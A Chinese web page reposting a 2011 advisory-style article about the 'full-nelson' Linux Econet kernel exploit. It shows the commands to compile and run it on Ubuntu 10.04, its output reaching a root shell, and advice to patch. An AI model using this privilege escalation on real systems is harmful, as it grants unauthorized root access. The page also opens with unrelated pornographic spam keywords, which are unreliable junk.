亚洲韩日午夜视频,欧美日韩在线精品一区二区三区,韩国超清无码一区二区三区,亚洲国产成人影院播放,久草新在线,在线看片AV色

您好,歡迎來到思海網絡,我們將竭誠為您提供優質的服務! 誠征網絡推廣 | 網站備案 | 幫助中心 | 軟件下載 | 購買流程 | 付款方式 | 聯系我們 [ 會員登錄/注冊 ]
促銷推廣
客服中心
業務咨詢
有事點擊這里…  531199185
有事點擊這里…  61352289
點擊這里給我發消息  81721488
有事點擊這里…  376585780
有事點擊這里…  872642803
有事點擊這里…  459248018
有事點擊這里…  61352288
有事點擊這里…  380791050
技術支持
有事點擊這里…  714236853
有事點擊這里…  719304487
有事點擊這里…  1208894568
有事點擊這里…  61352289
在線客服
有事點擊這里…  531199185
有事點擊這里…  61352288
有事點擊這里…  983054746
有事點擊這里…  893984210
當前位置:首頁 >> 技術文章 >> 文章瀏覽
技術文章

利用Linux 內核的多個安全漏洞獲得root 權限

添加時間:2011-2-24  添加: admin 

系統安全高手 Dan Rosenberg 發布了一段 C 程序,這段200多行的程序利用了 Linux Econet 協議的3個安全漏洞,可以導致本地帳號對系統進行拒絕服務或特權提升,也就是說一個普通用戶可以通過運行這段程序后輕松獲得 root shell,以下在 update 過的 Ubuntu 10.04 Server LTS 上測試通過:

 

$ sudo apt-get update
$ sudo apt-get upgrade

$ uname -r
2.6.32-21-server

$ gcc full-nelson.c -o full-nelson
$ ./full-nelson
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xffffffffa0131510
[+] Resolved econet_ops to 0xffffffffa0131600
[+] Resolved commit_creds to 0xffffffff8108b820
[+] Resolved prepare_kernel_cred to 0xffffffff8108bc00
[*] Calculating target...
[*] Failed to set Econet address.
[*] Triggering payload...
[*] Got root!
#
由于 RHEL/CentOS 默認不支持 Econet 協議,所以測試沒有通過:

# yum update

$ uname -r
2.6.18-194.26.1.el5

$ gcc full-nelson.c -o full-nelson
$ ./full-nelson
[*] Failed to open file deors.
如果在企業環境用 Ubuntu 的話可能會比較杯具了,幾百個帳號里總可以找到一兩個帳號被內部或外部人員通過上面這段程序拿到 root,這對服務器的危害是毀滅性的。前天還在說 Ubuntu 在內核方面無作為,現在想起來還有點后怕。VPSee 提醒正在使用多個普通帳號登錄 Ubuntu VPS 的朋友及時升級或打內核補丁,出售 VPN/SSH 帳號、提供免費 SSH 的商家尤其要小心 “客戶” 搗亂,使用其他 Linux 發行版的朋友也最好檢查一下自己的 VPS 有沒有這些高危漏洞。

關健詞:Linux,root

分享到:

頂部 】 【 關閉
版權所有:佛山思海電腦網絡有限公司 ©1998-2024 All Rights Reserved.
聯系電話:(0757)22630313、22633833
中華人民共和國增值電信業務經營許可證: 粵B1.B2-20030321 備案號:粵B2-20030321-1
網站公安備案編號:44060602000007 交互式欄目專項備案編號:200303DD003  
察察 工商 網安 舉報有獎  警警  手機打開網站